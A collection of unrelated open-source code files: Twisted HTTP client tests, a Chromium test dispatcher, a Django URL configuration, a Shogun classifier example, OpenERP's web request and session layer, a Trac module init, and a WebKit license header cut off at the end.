producer's C{stopProducing} method and raises L{ExcessWrite}.
"""
self.enforcer.write('x' * 10)
self.enforcer._noMoreWritesExpected()
self.assertFalse(self.producer.stopped)
self.assertRaises(ExcessWrite, self.enforcer.write, 'x')
self.assertTrue(self.producer.stopped)
def test_finishedLate(self):
"""
L{LengthEnforcingConsumer._noMoreWritesExpected} does nothing (in
particular, it does not raise any exception) if called after too many
bytes have been passed to C{write}.
"""
return self.test_writeTooMany(True)
def test_finished(self):
"""
If L{LengthEnforcingConsumer._noMoreWritesExpected} is called after
the correct number of bytes have been written it returns C{None}.
"""
self.enforcer.write('x' * 10)
self.assertIdentical(self.enforcer._noMoreWritesExpected(), None)
def test_stopProducingRaises(self):
"""
If L{LengthEnforcingConsumer.write} calls the producer's
C{stopProducing} because too many bytes were written and the
C{stopProducing} method raises an exception, the exception is logged
and the L{LengthEnforcingConsumer} still errbacks the finished
L{Deferred}.
"""
def brokenStopProducing():
StringProducer.stopProducing(self.producer)
raise ArbitraryException("stopProducing is busted")
self.producer.stopProducing = brokenStopProducing
def cbFinished(ignored):
self.assertEqual(
len(self.flushLoggedErrors(ArbitraryException)), 1)
d = self.test_writeTooMany()
d.addCallback(cbFinished)
return d
class RequestBodyConsumerTests(TestCase):
"""
Tests for L{ChunkedEncoder} which sits between an L{ITransport} and a
request/response body producer and chunked encodes everything written to
it.
"""
def test_interface(self):
"""
L{ChunkedEncoder} instances provide L{IConsumer}.
"""
self.assertTrue(
verifyObject(IConsumer, ChunkedEncoder(StringTransport())))
def test_write(self):
"""
L{ChunkedEncoder.write} writes to the transport the chunked encoded
form of the bytes passed to it.
"""
transport = StringTransport()
encoder = ChunkedEncoder(transport)
encoder.write('foo')
self.assertEqual(transport.value(), '3\r\nfoo\r\n')
transport.clear()
encoder.write('x' * 16)
self.assertEqual(transport.value(), '10\r\n' + 'x' * 16 + '\r\n')
def test_producerRegistration(self):
"""
L{ChunkedEncoder.registerProducer} registers the given streaming
producer with its transport and L{ChunkedEncoder.unregisterProducer}
writes a zero-length chunk to its transport and unregisters the
transport's producer.
"""
transport = StringTransport()
producer = object()
encoder = ChunkedEncoder(transport)
encoder.registerProducer(producer, True)
self.assertIdentical(transport.producer, producer)
self.assertTrue(transport.streaming)
encoder.unregisterProducer()
self.assertIdentical(transport.producer, None)
self.assertEqual(transport.value(), '0\r\n\r\n')
class TransportProxyProducerTests(TestCase):
"""
Tests for L{TransportProxyProducer} which proxies the L{IPushProducer}
interface of a transport.
"""
def test_interface(self):
"""
L{TransportProxyProducer} instances provide L{IPushProducer}.
"""
self.assertTrue(
verifyObject(IPushProducer, TransportProxyProducer(None)))
def test_stopProxyingUnreferencesProducer(self):
"""
L{TransportProxyProducer._stopProxying} drops the reference to the
wrapped L{IPushProducer} provider.
"""
transport = StringTransport()
proxy = TransportProxyProducer(transport)
self.assertIdentical(proxy._producer, transport)
proxy._stopProxying()
self.assertIdentical(proxy._producer, None)
def test_resumeProducing(self):
"""
L{TransportProxyProducer.resumeProducing} calls the wrapped
transport's C{resumeProducing} method unless told to stop proxying.
"""
transport = StringTransport()
transport.pauseProducing()
proxy = TransportProxyProducer(transport)
# The transport should still be paused.
self.assertEqual(transport.producerState, 'paused')
proxy.resumeProducing()
# The transport should now be resumed.
self.assertEqual(transport.producerState, 'producing')
transport.pauseProducing()
proxy._stopProxying()
# The proxy should no longer do anything to the transport.
proxy.resumeProducing()
self.assertEqual(transport.producerState, 'paused')
def test_pauseProducing(self):
"""
L{TransportProxyProducer.pauseProducing} calls the wrapped transport's
C{pauseProducing} method unless told to stop proxying.
"""
transport = StringTransport()
proxy = TransportProxyProducer(transport)
# The transport should still be producing.
self.assertEqual(transport.producerState, 'producing')
proxy.pauseProducing()
# The transport should now be paused.
self.assertEqual(transport.producerState, 'paused')
transport.resumeProducing()
proxy._stopProxying()
# The proxy should no longer do anything to the transport.
proxy.pauseProducing()
self.assertEqual(transport.producerState, 'producing')
def test_stopProducing(self):
"""
L{TransportProxyProducer.stopProducing} calls the wrapped transport's
C{stopProducing} method unless told to stop proxying.
"""
transport = StringTransport()
proxy = TransportProxyProducer(transport)
# The transport should still be producing.
self.assertEqual(transport.producerState, 'producing')
proxy.stopProducing()
# The transport should now be stopped.
self.assertEqual(transport.producerState, 'stopped')
transport = StringTransport()
proxy = TransportProxyProducer(transport)
proxy._stopProxying()
proxy.stopProducing()
# The transport should not have been stopped.
self.assertEqual(transport.producerState, 'producing')
class ResponseTests(TestCase):
"""
Tests for L{Response}.
"""
def test_makeConnection(self):
"""
The L{IProtocol} provider passed to L{Response.deliverBody} has its
C{makeConnection} method called with an L{IPushProducer} provider
hooked up to the response as an argument.
"""
producers = []
transport = StringTransport()
class SomeProtocol(Protocol):
def makeConnection(self, producer):
producers.append(producer)
consumer = SomeProtocol()
response = justTransportResponse(transport)
response.deliverBody(consumer)
[theProducer] = producers
theProducer.pauseProducing()
self.assertEqual(transport.producerState, 'paused')
theProducer.resumeProducing()
self.assertEqual(transport.producerState, 'producing')
def test_dataReceived(self):
"""
The L{IProtocol} provider passed to L{Response.deliverBody} has its
C{dataReceived} method called with bytes received as part of the
response body.
"""
bytes = []
class ListConsumer(Protocol):
def dataReceived(self, data):
bytes.append(data)
consumer = ListConsumer()
response = justTransportResponse(StringTransport())
response.deliverBody(consumer)
response._bodyDataReceived('foo')
self.assertEqual(bytes, ['foo'])
def test_connectionLost(self):
"""
The L{IProtocol} provider passed to L{Response.deliverBody} has its
C{connectionLost} method called with a L{Failure} wrapping
L{ResponseDone} when the response's C{_bodyDataFinished} method is
called.
"""
lost = []
class ListConsumer(Protocol):
def connectionLost(self, reason):
lost.append(reason)
consumer = ListConsumer()
response = justTransportResponse(StringTransport())
response.deliverBody(consumer)
response._bodyDataFinished()
lost[0].trap(ResponseDone)
self.assertEqual(len(lost), 1)
# The protocol reference should be dropped, too, to facilitate GC or
# whatever.
self.assertIdentical(response._bodyProtocol, None)
def test_bufferEarlyData(self):
"""
If data is delivered to the L{Response} before a protocol is registered
with C{deliverBody}, that data is buffered until the protocol is
registered and then is delivered.
"""
bytes = []
class ListConsumer(Protocol):
def dataReceived(self, data):
bytes.append(data)
protocol = ListConsumer()
response = justTransportResponse(StringTransport())
response._bodyDataReceived('foo')
response._bodyDataReceived('bar')
response.deliverBody(protocol)
response._bodyDataReceived('baz')
self.assertEqual(bytes, ['foo', 'bar', 'baz'])
# Make sure the implementation-detail-byte-buffer is cleared because
# not clearing it wastes memory.
self.assertIdentical(response._bodyBuffer, None)
def test_multipleStartProducingFails(self):
"""
L{Response.deliverBody} raises L{RuntimeError} if called more than
once.
"""
response = justTransportResponse(StringTransport())
response.deliverBody(Protocol())
self.assertRaises(RuntimeError, response.deliverBody, Protocol())
def test_startProducingAfterFinishedFails(self):
"""
L{Response.deliverBody} raises L{RuntimeError} if called after
L{Response._bodyDataFinished}.
"""
response = justTransportResponse(StringTransport())
response.deliverBody(Protocol())
response._bodyDataFinished()
self.assertRaises(RuntimeError, response.deliverBody, Protocol())
def test_bodyDataReceivedAfterFinishedFails(self):
"""
L{Response._bodyDataReceived} raises L{RuntimeError} if called after
L{Response._bodyDataFinished} but before L{Response.deliverBody}.
"""
response = justTransportResponse(StringTransport())
response._bodyDataFinished()
self.assertRaises(RuntimeError, response._bodyDataReceived, 'foo')
def test_bodyDataReceivedAfterDeliveryFails(self):
"""
L{Response._bodyDataReceived} raises L{RuntimeError} if called after
L{Response._bodyDataFinished} and after L{Response.deliverBody}.
"""
response = justTransportResponse(StringTransport())
response._bodyDataFinished()
response.deliverBody(Protocol())
self.assertRaises(RuntimeError, response._bodyDataReceived, 'foo')
def test_bodyDataFinishedAfterFinishedFails(self):
"""
L{Response._bodyDataFinished} raises L{RuntimeError} if called more
than once.
"""
response = justTransportResponse(StringTransport())
response._bodyDataFinished()
self.assertRaises(RuntimeError, response._bodyDataFinished)
def test_bodyDataFinishedAfterDeliveryFails(self):
"""
L{Response._bodyDataFinished} raises L{RuntimeError} if called after
the body has been delivered.
"""
response = justTransportResponse(StringTransport())
response._bodyDataFinished()
response.deliverBody(Protocol())
self.assertRaises(RuntimeError, response._bodyDataFinished)
def test_transportResumed(self):
"""
L{Response.deliverBody} resumes the HTTP connection's transport
before passing it to the transport's C{makeConnection} method.
"""
transportState = []
class ListConsumer(Protocol):
def makeConnection(self, transport):
transportState.append(transport.producerState)
transport = StringTransport()
transport.pauseProducing()
protocol = ListConsumer()
response = justTransportResponse(transport)
self.assertEqual(transport.producerState, 'paused')
response.deliverBody(protocol)
self.assertEqual(transportState, ['producing'])
def test_bodyDataFinishedBeforeStartProducing(self):
"""
If the entire body is delivered to the L{Response} before the
response's C{deliverBody} method is called, the protocol passed to
C{deliverBody} is immediately given the body data and then
disconnected.
"""
transport = StringTransport()
response = justTransportResponse(transport)
response._bodyDataReceived('foo')
response._bodyDataReceived('bar')
response._bodyDataFinished()
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
self.assertEqual(protocol.data, 'foobar')
protocol.closedReason.trap(ResponseDone)
def test_finishedWithErrorWhenConnected(self):
"""
The L{Failure} passed to L{Response._bodyDataFinished} when the response
is in the I{connected} state is passed to the C{connectionLost} method
of the L{IProtocol} provider passed to the L{Response}'s
C{deliverBody} method.
"""
transport = StringTransport()
response = justTransportResponse(transport)
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
# Sanity check - this test is for the connected state
self.assertEqual(response._state, 'CONNECTED')
response._bodyDataFinished(Failure(ArbitraryException()))
protocol.closedReason.trap(ArbitraryException)
def test_finishedWithErrorWhenInitial(self):
"""
The L{Failure} passed to L{Response._bodyDataFinished} when the response
is in the I{initial} state is passed to the C{connectionLost} method of
the L{IProtocol} provider passed to the L{Response}'s C{deliverBody}
method.
"""
transport = StringTransport()
response = justTransportResponse(transport)
# Sanity check - this test is for the initial state
self.assertEqual(response._state, 'INITIAL')
response._bodyDataFinished(Failure(ArbitraryException()))
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
protocol.closedReason.trap(ArbitraryException)
|
darktears/chromium-crosswalk | refs/heads/master | build/android/pylib/junit/test_dispatcher.py | 27 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from pylib import constants
from pylib.base import base_test_result
def RunTests(tests, runner_factory):
"""Runs a set of java tests on the host.
Return:
A tuple containing the results & the exit code.
"""
def run(t):
runner = runner_factory(None, None)
runner.SetUp()
results_list, return_code = runner.RunTest(t)
runner.TearDown()
return (results_list, return_code == 0)
test_run_results = base_test_result.TestRunResults()
exit_code = 0
for t in tests:
results_list, passed = run(t)
test_run_results.AddResults(results_list)
if not passed:
exit_code = constants.ERROR_EXIT_CODE
return (test_run_results, exit_code)
|
vipul-sharma20/oh-mainline | refs/heads/master | vendor/packages/Django/tests/regressiontests/middleware_exceptions/urls.py | 150 | # coding: utf-8
from __future__ import absolute_import
from django.conf.urls import patterns
from . import views
urlpatterns = patterns('',
(r'^middleware_exceptions/view/$', views.normal_view),
(r'^middleware_exceptions/not_found/$', views.not_found),
(r'^middleware_exceptions/error/$', views.server_error),
(r'^middleware_exceptions/null_view/$', views.null_view),
(r'^middleware_exceptions/permission_denied/$', views.permission_denied),
(r'^middleware_exceptions/template_response/$', views.template_response),
(r'^middleware_exceptions/template_response_error/$', views.template_response_error),
)
|
JingheZ/shogun | refs/heads/master | examples/undocumented/python_modular/classifier_multiclass_ecoc_discriminant.py | 19 | #!/usr/bin/env python
from tools.multiclass_shared import prepare_data
[traindat, label_traindat, testdat, label_testdat] = prepare_data(False)
parameter_list = [[traindat,testdat,label_traindat,label_testdat,2.1,1,1e-5],[traindat,testdat,label_traindat,label_testdat,2.2,1,1e-5]]
def classifier_multiclass_ecoc_discriminant (fm_train_real=traindat,fm_test_real=testdat,label_train_multiclass=label_traindat,label_test_multiclass=label_testdat,lawidth=2.1,C=1,epsilon=1e-5):
from modshogun import RealFeatures, MulticlassLabels
from modshogun import LibLinear, L2R_L2LOSS_SVC, LinearMulticlassMachine
from modshogun import ECOCStrategy, ECOCDiscriminantEncoder, ECOCHDDecoder
feats_train = RealFeatures(fm_train_real)
feats_test = RealFeatures(fm_test_real)
labels = MulticlassLabels(label_train_multiclass)
classifier = LibLinear(L2R_L2LOSS_SVC)
classifier.set_epsilon(epsilon)
classifier.set_bias_enabled(True)
encoder = ECOCDiscriminantEncoder()
encoder.set_features(feats_train)
encoder.set_labels(labels)
encoder.set_sffs_iterations(50)
strategy = ECOCStrategy(encoder, ECOCHDDecoder())
classifier = LinearMulticlassMachine(strategy, feats_train, classifier, labels)
classifier.train()
label_pred = classifier.apply(feats_test)
out = label_pred.get_labels()
if label_test_multiclass is not None:
from modshogun import MulticlassAccuracy
labels_test = MulticlassLabels(label_test_multiclass)
evaluator = MulticlassAccuracy()
acc = evaluator.evaluate(label_pred, labels_test)
print('Accuracy = %.4f' % acc)
return out
if __name__=='__main__':
print('MulticlassMachine')
classifier_multiclass_ecoc_discriminant(*parameter_list[0])
|
gqwest-erp/server | refs/heads/master | openerp/addons/web/http.py | 57 | # -*- coding: utf-8 -*-
#----------------------------------------------------------
# OpenERP Web HTTP layer
#----------------------------------------------------------
import ast
import cgi
import contextlib
import functools
import getpass
import logging
import mimetypes
import os
import pprint
import random
import sys
import tempfile
import threading
import time
import traceback
import urlparse
import uuid
import xmlrpclib
import errno
import babel.core
import simplejson
import werkzeug.contrib.sessions
import werkzeug.datastructures
import werkzeug.exceptions
import werkzeug.utils
import werkzeug.wrappers
import werkzeug.wsgi
import openerp
import session
_logger = logging.getLogger(__name__)
#----------------------------------------------------------
# RequestHandler
#----------------------------------------------------------
class WebRequest(object):
""" Parent class for all OpenERP Web request types, mostly deals with
initialization and setup of the request object (the dispatching itself has
to be handled by the subclasses)
:param request: a wrapped werkzeug Request object
:type request: :class:`werkzeug.wrappers.BaseRequest`
.. attribute:: httprequest
the original :class:`werkzeug.wrappers.Request` object provided to the
request
.. attribute:: httpsession
a :class:`~collections.Mapping` holding the HTTP session data for the
current http session
.. attribute:: params
:class:`~collections.Mapping` of request parameters, not generally
useful as they're provided directly to the handler method as keyword
arguments
.. attribute:: session_id
opaque identifier for the :class:`session.OpenERPSession` instance of
the current request
.. attribute:: session
:class:`~session.OpenERPSession` instance for the current request
.. attribute:: context
:class:`~collections.Mapping` of context values for the current request
.. attribute:: debug
``bool``, indicates whether the debug mode is active on the client
"""
def __init__(self, request):
self.httprequest = request
self.httpresponse = None
self.httpsession = request.session
def init(self, params):
self.params = dict(params)
# OpenERP session setup
self.session_id = self.params.pop("session_id", None) or uuid.uuid4().hex
self.session = self.httpsession.get(self.session_id)
if not self.session:
self.session = session.OpenERPSession()
self.httpsession[self.session_id] = self.session
# set db/uid trackers - they're cleaned up at the WSGI
# dispatching phase in openerp.service.wsgi_server.application
if self.session._db:
threading.current_thread().dbname = self.session._db
if self.session._uid:
threading.current_thread().uid = self.session._uid
self.context = self.params.pop('context', {})
self.debug = self.params.pop('debug', False) is not False
# Determine self.lang
lang = self.params.get('lang', None)
if lang is None:
lang = self.context.get('lang')
if lang is None:
lang = self.httprequest.cookies.get('lang')
if lang is None:
lang = self.httprequest.accept_languages.best
if not lang:
lang = 'en_US'
# tranform 2 letters lang like 'en' into 5 letters like 'en_US'
lang = babel.core.LOCALE_ALIASES.get(lang, lang)
# we use _ as seprator where RFC2616 uses '-'
self.lang = lang.replace('-', '_')
def reject_nonliteral(dct):
if '__ref' in dct:
raise ValueError(
"Non literal contexts can not be sent to the server anymore (%r)" % (dct,))
return dct
class JsonRequest(WebRequest):
""" JSON-RPC2 over HTTP.
Sucessful request::
--> {"jsonrpc": "2.0",
"method": "call",
"params": {"session_id": "SID",
"context": {},
"arg1": "val1" },
"id": null}
<-- {"jsonrpc": "2.0",
"result": { "res1": "val1" },
"id": null}
Request producing a error::
--> {"jsonrpc": "2.0",
"method": "call",
"params": {"session_id": "SID",
"context": {},
"arg1": "val1" },
"id": null}
<-- {"jsonrpc": "2.0",
"error": {"code": 1,
"message": "End user error message.",
"data": {"code": "codestring",
"debug": "traceback" } },
"id": null}
"""
def dispatch(self, method):
""" Calls the method asked for by the JSON-RPC2 or JSONP request
:param method: the method which received the request
:returns: an utf8 encoded JSON-RPC2 or JSONP reply
"""
args = self.httprequest.args
jsonp = args.get('jsonp')
requestf = None
request = None
request_id = args.get('id')
if jsonp and self.httprequest.method == 'POST':
# jsonp 2 steps step1 POST: save call
self.init(args)
self.session.jsonp_requests[request_id] = self.httprequest.form['r']
headers=[('Content-Type', 'text/plain; charset=utf-8')]
r = werkzeug.wrappers.Response(request_id, headers=headers)
return r
elif jsonp and args.get('r'):
# jsonp method GET
request = args.get('r')
elif jsonp and request_id:
# jsonp 2 steps step2 GET: run and return result
self.init(args)
request = self.session.jsonp_requests.pop(request_id, "")
else:
# regular jsonrpc2
requestf = self.httprequest.stream
response = {"jsonrpc": "2.0" }
error = None
try:
# Read POST content or POST Form Data named "request"
if requestf:
self.jsonrequest = simplejson.load(requestf, object_hook=reject_nonliteral)
else:
self.jsonrequest = simplejson.loads(request, object_hook=reject_nonliteral)
self.init(self.jsonrequest.get("params", {}))
if _logger.isEnabledFor(logging.DEBUG):
_logger.debug("--> %s.%s\n%s", method.im_class.__name__, method.__name__, pprint.pformat(self.jsonrequest))
response['id'] = self.jsonrequest.get('id')
response["result"] = method(self, **self.params)
except session.AuthenticationError:
error = {
'code': 100,
'message': "OpenERP Session Invalid",
'data': {
'type': 'session_invalid',
'debug': traceback.format_exc()
}
}
except xmlrpclib.Fault, e:
error = {
'code': 200,
'message': "OpenERP Server Error",
'data': {
'type': 'server_exception',
'fault_code': e.faultCode,
'debug': "Client %s\nServer %s" % (
"".join(traceback.format_exception("", None, sys.exc_traceback)), e.faultString)
}
}
except Exception:
logging.getLogger(__name__ + '.JSONRequest.dispatch').exception\
("An error occured while handling a json request")
error = {
'code': 300,
'message': "OpenERP WebClient Error",
'data': {
'type': 'client_exception',
'debug': "Client %s" % traceback.format_exc()
}
}
if error:
response["error"] = error
if _logger.isEnabledFor(logging.DEBUG):
_logger.debug("<--\n%s", pprint.pformat(response))
if jsonp:
# If we use jsonp, that's mean we are called from another host
# Some browser (IE and Safari) do no allow third party cookies
# We need then to manage http sessions manually.
response['httpsessionid'] = self.httpsession.sid
mime = 'application/javascript'
body = "%s(%s);" % (jsonp, simplejson.dumps(response),)
else:
mime = 'application/json'
body = simplejson.dumps(response)
r = werkzeug.wrappers.Response(body, headers=[('Content-Type', mime), ('Content-Length', len(body))])
return r
def jsonrequest(f):
""" Decorator marking the decorated method as being a handler for a
JSON-RPC request (the exact request path is specified via the
``$(Controller._cp_path)/$methodname`` combination.
If the method is called, it will be provided with a :class:`JsonRequest`
instance and all ``params`` sent during the JSON-RPC request, apart from
the ``session_id``, ``context`` and ``debug`` keys (which are stripped out
beforehand)
"""
f.exposed = 'json'
return f
class HttpRequest(WebRequest):
""" Regular GET/POST request
"""
def dispatch(self, method):
params = dict(self.httprequest.args)
params.update(self.httprequest.form)
params.update(self.httprequest.files)
self.init(params)
akw = {}
for key, value in self.httprequest.args.iteritems():
if isinstance(value, basestring) and len(value) < 1024:
akw[key] = value
else:
akw[key] = type(value)
_logger.debug("%s --> %s.%s %r", self.httprequest.method, method.im_class.__name__, method.__name__, akw)
try:
r = method(self, **self.params)
except xmlrpclib.Fault, e:
r = werkzeug.exceptions.InternalServerError(cgi.escape(simplejson.dumps({
'code': 200,
'message': "OpenERP Server Error",
'data': {
'type': 'server_exception',
'fault_code': e.faultCode,
'debug': "Server %s\nClient %s" % (
e.faultString, traceback.format_exc())
}
})))
except Exception:
logging.getLogger(__name__ + '.HttpRequest.dispatch').exception(
"An error occurred while handling a json request")
r = werkzeug.exceptions.InternalServerError(cgi.escape(simplejson.dumps({
'code': 300,
'message': "OpenERP WebClient Error",
'data': {
'type': 'client_exception',
'debug': "Client %s" % traceback.format_exc()
}
})))
if self.debug or 1:
if isinstance(r, (werkzeug.wrappers.BaseResponse, werkzeug.exceptions.HTTPException)):
_logger.debug('<-- %s', r)
else:
_logger.debug("<-- size: %s", len(r))
return r
def make_response(self, data, headers=None, cookies=None):
""" Helper for non-HTML responses, or HTML responses with custom
response headers or cookies.
While handlers can just return the HTML markup of a page they want to
send as a string if non-HTML data is returned they need to create a
complete response object, or the returned data will not be correctly
interpreted by the clients.
:param basestring data: response body
:param headers: HTTP headers to set on the response
:type headers: ``[(name, value)]``
:param collections.Mapping cookies: cookies to set on the client
"""
response = werkzeug.wrappers.Response(data, headers=headers)
if cookies:
for k, v in cookies.iteritems():
response.set_cookie(k, v)
return response
def not_found(self, description=None):
""" Helper for 404 response, return its result from the method
"""
return werkzeug.exceptions.NotFound(description)
def httprequest(f):
""" Decorator marking the decorated method as being a handler for a
normal HTTP request (the exact request path is specified via the
``$(Controller._cp_path)/$methodname`` combination.
If the method is called, it will be provided with a :class:`HttpRequest`
instance and all ``params`` sent during the request (``GET`` and ``POST``
merged in the same dictionary), apart from the ``session_id``, ``context``
and ``debug`` keys (which are stripped out beforehand)
"""
f.exposed = 'http'
return f
#----------------------------------------------------------
# Controller registration with a metaclass
#----------------------------------------------------------
addons_module = {}
addons_manifest = {}
controllers_class = []
controllers_class_path = {}
controllers_object = {}
controllers_object_path = {}
controllers_path = {}
class ControllerType(type):
def __init__(cls, name, bases, attrs):
super(ControllerType, cls).__init__(name, bases, attrs)
name_class = ("%s.%s" % (cls.__module__, cls.__name__), cls)
controllers_class.append(name_class)
path = attrs.get('_cp_path')
if path not in controllers_class_path:
controllers_class_path[path] = name_class
class Controller(object):
__metaclass__ = ControllerType
def __new__(cls, *args, **kwargs):
subclasses = [c for c in cls.__subclasses__() if c._cp_path == cls._cp_path]
if subclasses:
name = "%s (extended by %s)" % (cls.__name__, ', '.join(sub.__name__ for sub in subclasses))
cls = type(name, tuple(reversed(subclasses)), {})
return object.__new__(cls)
#----------------------------------------------------------
# Session context manager
#----------------------------------------------------------
@contextlib.contextmanager
def session_context(request, session_store, session_lock, sid):
with session_lock:
if sid:
request.session = session_store.get(sid)
else:
request.session = session_store.new()
try:
yield request.session
finally:
# Remove all OpenERPSession instances with no uid, they're generated
# either by login process or by HTTP requests without an OpenERP
# session id, and are generally noise
removed_sessions = set()
for key, value in request.session.items():
if not isinstance(value, session.OpenERPSession):
continue
if getattr(value, '_suicide', False) or (
not value._uid
and not value.jsonp_requests
# FIXME do not use a fixed value
and value._creation_time + (60*5) < time.time()):
_logger.debug('remove session %s', key)
removed_sessions.add(key)
del request.session[key]
with session_lock:
if sid:
# Re-load sessions from storage and merge non-literal
# contexts and domains (they're indexed by hash of the
# content so conflicts should auto-resolve), otherwise if
# two requests alter those concurrently the last to finish
# will overwrite the previous one, leading to loss of data
# (a non-literal is lost even though it was sent to the
# client and client errors)
#
# note that domains_store and contexts_store are append-only (we
# only ever add items to them), so we can just update one with the
# other to get the right result, if we want to merge the
# ``context`` dict we'll need something smarter
in_store = session_store.get(sid)
for k, v in request.session.iteritems():
stored = in_store.get(k)
if stored and isinstance(v, session.OpenERPSession):
if hasattr(v, 'contexts_store'):
del v.contexts_store
if hasattr(v, 'domains_store'):
del v.domains_store
if not hasattr(v, 'jsonp_requests'):
v.jsonp_requests = {}
v.jsonp_requests.update(getattr(
stored, 'jsonp_requests', {}))
# add missing keys
for k, v in in_store.iteritems():
if k not in request.session and k not in removed_sessions:
request.session[k] = v
session_store.save(request.session)
def session_gc(session_store):
if random.random() < 0.001:
# we keep session one week
last_week = time.time() - 60*60*24*7
for fname in os.listdir(session_store.path):
path = os.path.join(session_store.path, fname)
try:
if os.path.getmtime(path) < last_week:
os.unlink(path)
except OSError:
pass
#----------------------------------------------------------
# WSGI Application
#----------------------------------------------------------
# Add potentially missing (older ubuntu) font mime types
mimetypes.add_type('application/font-woff', '.woff')
mimetypes.add_type('application/vnd.ms-fontobject', '.eot')
mimetypes.add_type('application/x-font-ttf', '.ttf')
class DisableCacheMiddleware(object):
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
def start_wrapped(status, headers):
referer = environ.get('HTTP_REFERER', '')
parsed = urlparse.urlparse(referer)
debug = parsed.query.count('debug') >= 1
new_headers = []
unwanted_keys = ['Last-Modified']
if debug:
new_headers = [('Cache-Control', 'no-cache')]
unwanted_keys += ['Expires', 'Etag', 'Cache-Control']
for k, v in headers:
if k not in unwanted_keys:
new_headers.append((k, v))
start_response(status, new_headers)
return self.app(environ, start_wrapped)
def session_path():
try:
import pwd
username = pwd.getpwuid(os.geteuid()).pw_name
except ImportError:
try:
username = getpass.getuser()
except Exception:
username = "unknown"
path = os.path.join(tempfile.gettempdir(), "oe-sessions-" + username)
try:
os.mkdir(path, 0700)
except OSError as exc:
if exc.errno == errno.EEXIST:
# directory exists: ensure it has the correct permissions
# this will fail if the directory is not owned by the current user
os.chmod(path, 0700)
else:
raise
return path
class Root(object):
"""Root WSGI application for the OpenERP Web Client.
"""
def __init__(self):
self.addons = {}
self.statics = {}
self.load_addons()
# Setup http sessions
path = session_path()
self.session_store = werkzeug.contrib.sessions.FilesystemSessionStore(path)
self.session_lock = threading.Lock()
_logger.debug('HTTP sessions stored in: %s', path)
def __call__(self, environ, start_response):
""" Handle a WSGI request
"""
return self.dispatch(environ, start_response)
def dispatch(self, environ, start_response):
"""
Performs the actual WSGI dispatching for the application, may be
wrapped during the initialization of the object.
Call the object directly.
"""
request = werkzeug.wrappers.Request(environ)
request.parameter_storage_class = werkzeug.datastructures.ImmutableDict
request.app = self
handler = self.find_handler(*(request.path.split('/')[1:]))
if not handler:
response = werkzeug.exceptions.NotFound()
else:
sid = request.cookies.get('sid')
if not sid:
sid = request.args.get('sid')
session_gc(self.session_store)
with session_context(request, self.session_store, self.session_lock, sid) as session:
result = handler(request)
if isinstance(result, basestring):
headers=[('Content-Type', 'text/html; charset=utf-8'), ('Content-Length', len(result))]
response = werkzeug.wrappers.Response(result, headers=headers)
else:
response = result
if hasattr(response, 'set_cookie'):
response.set_cookie('sid', session.sid)
return response(environ, start_response)
def load_addons(self):
""" Load all addons from addons patch containg static files and
controllers and configure them. """
for addons_path in openerp.modules.module.ad_paths:
for module in sorted(os.listdir(str(addons_path))):
if module not in addons_module:
manifest_path = os.path.join(addons_path, module, '__openerp__.py')
path_static = os.path.join(addons_path, module, 'static')
if os.path.isfile(manifest_path) and os.path.isdir(path_static):
manifest = ast.literal_eval(open(manifest_path).read())
manifest['addons_path'] = addons_path
_logger.debug("Loading %s", module)
if 'openerp.addons' in sys.modules:
m = __import__('openerp.addons.' + module)
else:
m = __import__(module)
addons_module[module] = m
addons_manifest[module] = manifest
self.statics['/%s/static' % module] = path_static
for k, v in controllers_class_path.items():
if k not in controllers_object_path and hasattr(v[1], '_cp_path'):
o = v[1]()
controllers_object[v[0]] = o
controllers_object_path[k] = o
if hasattr(o, '_cp_path'):
controllers_path[o._cp_path] = o
app = werkzeug.wsgi.SharedDataMiddleware(self.dispatch, self.statics)
self.dispatch = DisableCacheMiddleware(app)
def find_handler(self, *l):
"""
Tries to discover the controller handling the request for the path
specified by the provided parameters
:param l: path sections to a controller or controller method
:returns: a callable matching the path sections, or ``None``
:rtype: ``Controller | None``
"""
if l:
ps = '/' + '/'.join(filter(None, l))
method_name = 'index'
while ps:
c = controllers_path.get(ps)
if c:
method = getattr(c, method_name, None)
if method:
exposed = getattr(method, 'exposed', False)
if exposed == 'json':
_logger.debug("Dispatch json to %s %s %s", ps, c, method_name)
return lambda request: JsonRequest(request).dispatch(method)
elif exposed == 'http':
_logger.debug("Dispatch http to %s %s %s", ps, c, method_name)
return lambda request: HttpRequest(request).dispatch(method)
ps, _slash, method_name = ps.rpartition('/')
if not ps and method_name:
ps = '/'
return None
def wsgi_postload():
openerp.wsgi.register_wsgi_handler(Root())
# vim:et:ts=4:sw=4:
|
walty8/trac | refs/heads/trunk | trac/admin/__init__.py | 8 | # -*- coding: utf-8 -*-
#
# Copyright (C)2006-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
from trac.admin.api import *
|
jdar/phantomjs-modified | refs/heads/master | src/qt/qtwebkit/Tools/Scripts/webkitpy/bindings/main.py | 117 | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
